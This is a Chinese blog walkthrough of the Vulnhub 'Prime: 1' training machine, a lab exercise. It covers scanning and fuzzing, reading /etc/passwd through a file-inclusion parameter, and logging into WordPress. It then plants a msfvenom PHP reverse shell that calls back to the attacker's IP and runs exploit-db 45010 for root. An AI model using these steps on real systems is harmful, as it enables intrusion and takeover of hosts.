Vulnhub-prime-1的渗透

最新推荐文章于 2024-07-19 17:26:37 发布
最新推荐文章于 2024-07-19 17:26:37 发布
阅读量64 收藏 1
点赞数
分类专栏: 靶机渗透 文章标签: 网络安全 安全性测试 web安全 linux php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_51289292/article/details/134813516
版权

确定目标

目标机和攻击机网卡均为nat模式,故只需扫描192.168.131.1的c段地址

用nmap扫描局域网内的靶机

发现三个ip:192.168.131.2(网关),192.168.131.130(kali攻击机的ip),192.168.131.132(目标机ip)

nmap -p 1-65535 -A 192.168.131.132 查看靶机开放端口

可以发现22,80端口开着,靶机操作系统为Ubuntu,这两个端口意味着可以两个思路,通过ssh或者http连接靶机,当然接下来还要看作者的提示

信息搜集

访问下目标看看能发现什么

只是一个图片,也没有输入命令或者上传的窗口,于是我们猜想提示可能在敏感目录中

于是用扫描目录的工具:dirb或者御剑,我这里用了dirb

dirb http://192.168.131.132

发现了三个比较关键的目录:dev,index.php,wordpress

访问dev,发现作者的开头祝福

访问wordpress,一个登陆界面,之后可能会用到,小本本记下来

访问index.php,网页首页

还是没有找到下一步的提示,我们尝试精确一下目录扫描,只扫描,后缀名为:txt,php,zip的文件

dirb http://192.168.131.132 -X .txt,.php,.zip

发现三个路径:image.php,index.php,secret.txt

访问secret.tx

发现了作者的提示,1:对php页面进行fuzz测试(模糊测试)2:获得关键参数后访问location.txt

也就是说要知道http://192.168.131.132/index.php?fuzz=location.txt 这个地址的fuzz是啥​​​​​​

作者给出了fuzz工具的连接,我这里使用了kali自带的wfuzz

wfuzz -w /usr/share/wfuzz/wordlist/general/common.txt http://192.168.131.132/index.php?FUZZ=

发现九百多个结果,如果我们要找到答案就需要进行过滤,通过观察发现,大部分返回的是12w,我们尝试过滤掉12w的返回值,

wfuzz -w /usr/share/wfuzz/wordlist/general/common.txt --hw 12 http://192.168.131.132/index.php?FUZZ=

发现了file这个目录,访问一下,发现作者的提示

我们加上之前提示的location.txt发现作者的新提示

作者告诉在另一个php页面(也就是之前扫描发现的image.php),使用secrettier360这个参数

访问之后发现;

没有其他提示,尝试使用rce,前面知道目标系统为linux,尝试访问/etc/passwd发现

访问后得到,密码follow_the_ippsec

这个密码在哪里用呢,我们想到了之前发现的wordpress页面

但是问题来了,用户名是什么?

这里用wpscan进行扫描,得到用户名victor

wpscan --url http://192.168.131.132/wordpress --enumerate u

尝试登录,进入目标后台

挂马

发现这里可以写入php代码

于是通过msf写一个反弹shell

msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.131.130 lport=7777 -o shell.php

将恶意代码写入

对目标窃听

use exploit/multi/handler(使用窃听模块)

set lhost 192.168.131.130(设置攻击机ip)

set lport 7777(设置端口)

run (开启窃听)

查看本地文件,可知secret.php的位置

http://192.168.131.132/wordpress/wp-content/themes/twentynineteen/secret.php

监听端上线,使用getuid,sysinfo得知服务器名称,和系统版本

提权

使用 searchsploit 16.04 Ubuntu查看msf里面带的漏洞脚本

msf的所有脚本路径都在/usr/share/exploitdb/exploits/linux/local下

于是将其复制到指定位置

 cp /usr/share/exploitdb/exploits/linux/local/45010.c ./

该脚本为c语言,运行之后打包成一个文件45010

gcc 45010.c -o 45010

上传该脚本

给45010提升可执行权限

shell
cd /tmp
ls
chmod +x 45010
./45010
whoami

小结

用到的工具:

确定目标:nmap

信息搜集:dirb,wfuzz,wpscan,

挂马\提权:msfvenom,msfconsole

小e爱学习
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
渗透测试vulnhub-prime
weixin_50683638的博客
11-25 2727
本次实验需要kali虚拟机和靶机(此次靶机版本为ubuntu16-04)靶机我们不知道ip。 kali和靶机默认nat模式即可 在kali(攻击机ip:192.168.3.129)扫描局域网内C段主机(探测靶机ip) nmap -sP 192.168.3.1/24扫描到靶机ip为192.168.130 扫描ip的端口服务nmap -P 1-65535 -A 192.168.3.130看到22和80端口开启 我们访问一下192.168.3.130查看源码发现并没有什么 我们先目录扫描看看有什么信息,有
vulnhub-prime_series_level_1渗透测试
遇事不决冲冲冲
11-22 6232
环境搭建 官网https://www.vulnhub.com/entry/prime-1,358/ 将VMX文件(VMWare 文件格式详解 .VMX .VMSD .VMDK )直接拖进来 思路 扫描网站路径与敏感文件,通过不断的提示找到一个可用的fuzz工具。利用fuzzing爆破参数发现了可利用进行文件包含的参数file,这里再得到提示后,在仅有的一个php文件中利用secrettier360参数fuzzing系统敏感文件,找到一个密码后在wordpress页面进行登录,找到一个可以写入内容的页面,写
Vulnhub | 实战靶场渗透测试 - PRIME: 1
尼泊罗河伯的博客
06-01 1658
这台机器是为那些试图准备 OSCP 或 OSCP 考试的人设计的。这是素数系列的第一级。在每个阶段都会提供一些帮助。机器很长,因为 OSCP 和黑客的机器是设计的。因此,您有一个获取根标志和用户标志的目标。如果卡在某个点上,则会在枚举级别上提供一些帮助。
Vulnhub-靶机-PRIME: 1
weixin_45042115的博客
10-03 1542
今天发现了一个有趣的靶机,加载到本地VMware Workstation工作站进行漏洞复现 靶机下载地址 https://www.vulnhub.com/entry/prime-1,358/ 对目标进行扫描发现开放端口信息 nmap -sS -sV -p- -T5 100.100.100.130 浏览器访问,并对其进行目录扫描 dirb 描目录发现了/wordpress目录和一些其他的页面 对wordpress进行扫描 wpscan--url http://rip/wordpress/ --
vuInhub靶场实战系列-prime:2
06-08
vuInhub靶场实战系列-prime:2
E-Prime程序示例.zip
10-08
E-Prime示例集E-Prime示例集E-Prime示例集E-Prime示例集E-Prime示例集E-Prime是由卡奈基-梅龙大学和匹兹堡大学联合开发心理学实验操作平台,是一个高等的图形设计环境,提供革命性的新工具,以加速实验发展,E-Prime...
IAT实验E-PRIME报告.doc
06-06
IAT实验E-PRIME报告
E-prime 1 简明使用说明
10-30
E-prime 1.0 的简明使用说明,可以用来做一些行为实验。
E-prime.rar
10-09
E-prime压缩包,适用于开发心理学试验,直接解压安装即可
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8340
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
Postman 中的 API 安全性测试:最佳实践与技巧
2402_85762143的博客
07-12 561
通过本文的介绍,你应该对如何在 Postman 中进行 API 的安全性测试有了深入的了解。记住,安全性测试是一个持续的过程,需要定期进行以应对不断变化的安全威胁。使用 Postman 提供的工具和技巧,你可以为你的 API 构建一个强大的安全防线。
网络安全防御 -- 双机热备和带宽管理综合实验
rrl18215821889的博客
07-16 553
12,对现有网络进行改造升级,将当个防火墙组网改成双机热备的组网形式,做负载分担模式,游客区和DMZ区走FW3,生产区和办公区的流量走FW1。13,办公区上网用户限制流量不超过100M,其中销售部人员在其基础上限制流量不超过60M,且销售部一共10人,每人限制流量不超过6M。16,外网访问内网服务器,下行流量不超过40M,DMZ中的每台服务器限制对外提供的最大下行带宽不超过20M。做负载分担模式,生产区和办公区的流量走FW1,游客区和DMZ区走FW3。配置g0/0/0ip和开启服务。办公区销售部带宽策略;
网络安全-网络安全及其防护措施8
LS_Ai的博客
07-17 1134
数据中心网络架构是指数据中心内部网络的设计和结构,其目的是提供高性能、高可用性和高扩展性的网络连接。合理的数据中心网络架构能够支持大规模数据处理和传输,满足数据中心的业务需求,提高整体运营效率。负载均衡是一种分配网络流量和计算任务的方法,旨在优化资源利用率、提高系统性能和增强服务可用性。通过将请求分配到多个服务器上,负载均衡避免了单点故障和性能瓶颈,确保系统稳定和高效运行。网络安全策略是指为保护网络和信息系统的安全而制定的一系列规则和措施。
Web安全:未验证的重定向和转发.
最新发布
网络安全领域___专研者.
07-19 547
未验证的重定向和转发漏洞是一种常见的Web安全漏洞,它允许攻击者将用户重定向到一个恶意的URL,而不是预期的安全URL。这种漏洞通常发生在应用程序处理重定向和转发请求时,未能对目标URL进行适当的验证和过滤。
网络安全防御【防火墙双机热备带宽管理综合实验】
miss_copper的博客
07-16 1241
游客区人员不固定,不允许访问DMZ区和生产区,统一使用Guest用户登录,密码Admin@123,游客仅有访问公司门户网站和上网的权利,门户网站地址10.0.3.10。5、生产区访问DMZ区时,需要进行protal认证,设立生产区用户架构,至少包含三个部门,每个部门三个用户,用户统一密码openlab123,12,对现有网络进行改造升级,将当个防火墙组网改成双机热备的组网形式,做负载分担模式,游客区和DMZ区走FW3,生产区和办公区的流量走FW1。链路开启过载保护,保护阈值80%;
游戏外挂的技术实现与五年脚本开发经验分享
m0_62996549的博客
07-19 469
引言: 在数字娱乐的浪潮中,电子游戏成为许多人生活中不可或缺的一部分。然而,随着游戏的普及,一些玩家为了追求更高效的游戏体验或不正当竞争优势,开始使用游戏外挂程序。这些外挂往往通过修改游戏正常运行机制来提供非法优势给使用者。作为拥有五年脚本开发经验的技术人员,我深知探索这一领域需要严谨的态度和对技术的尊重。本文将探讨游戏外挂的技术实现方法,并分享我在脚本开发领域的经验。
网络安全-网络安全及其防护措施6
LS_Ai的博客
07-16 923
访问控制列表(ACL)是一种网络安全机制,用于控制网络设备上的数据包流量。通过ACL,可以定义允许或拒绝的流量,增强网络的安全性和管理效率。ACL通过在路由器或交换机上设置规则,确定哪些流量可以通过,哪些流量应该被阻止。入侵检测系统(IDS)定义:监控网络流量和系统活动,检测和记录潜在的安全威胁和攻击行为。IDS提供告警信息,但不主动阻止攻击。作用:检测并报警,但不干预攻击,主要用于识别潜在的安全问题和攻击模式。入侵防御系统(IPS)定义:在IDS的基础上,进一步采取措施阻止攻击行为,保护网络安全
如何保护你的网络安全
m0_70655343的博客
07-15 763
这项服务可以抵御复杂的网络威胁,即使在最强烈的攻击下也能保证您的网站服务如常,用户几乎无感知。此外,DDoS高防服务还具备网络应用程序防火墙(WAF),采用实时监控和机器学习来保护用户的资料,防止用户资料被盗,保护服务免遭未经授权的访问,降低个人数据泄露的风险,进而防止数字资产流失。为什么它这么重要呢?打个比方,这就像是你家车库的门开关出了问题,每次你按下按钮,车库门就不停地开关,直到电池耗尽。想象一下,你家的路由器被人利用来发起攻击,就像是你家的水龙头被打开,水不停地流向别人的房子,淹没了他们的院子。
e-prime违反许可协议
12-11
E-prime是一家供应商根据软件许可协议提供服务的公司。软件许可协议是为了保护软件的知识产权和用户的合法权益而设立的。如果e-prime违反了软件许可协议,那将是对合同的违约行为。 软件许可协议通常会规定用户可以合法使用软件的范围,以及禁止用户进行未经许可的复制、传播、修改和出售软件等行为。如果e-prime违反了这些规定,就会侵犯软件的知识产权,影响其他用户的合法权益。 一旦e-prime违反了软件许可协议,用户可以通过法律手段来维护自己的合法权益。他们可以要求e-prime停止侵权行为并承担相应的法律责任。另外,e-prime违反软件许可协议还可能会面临合同解除、赔偿损失等后果。 总之,e-prime如果违反了软件许可协议,将会导致不良的法律后果,损害自己的信誉和利益。因此,e-prime需要严格遵守软件许可协议的规定,以免给自己带来不必要的麻烦。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值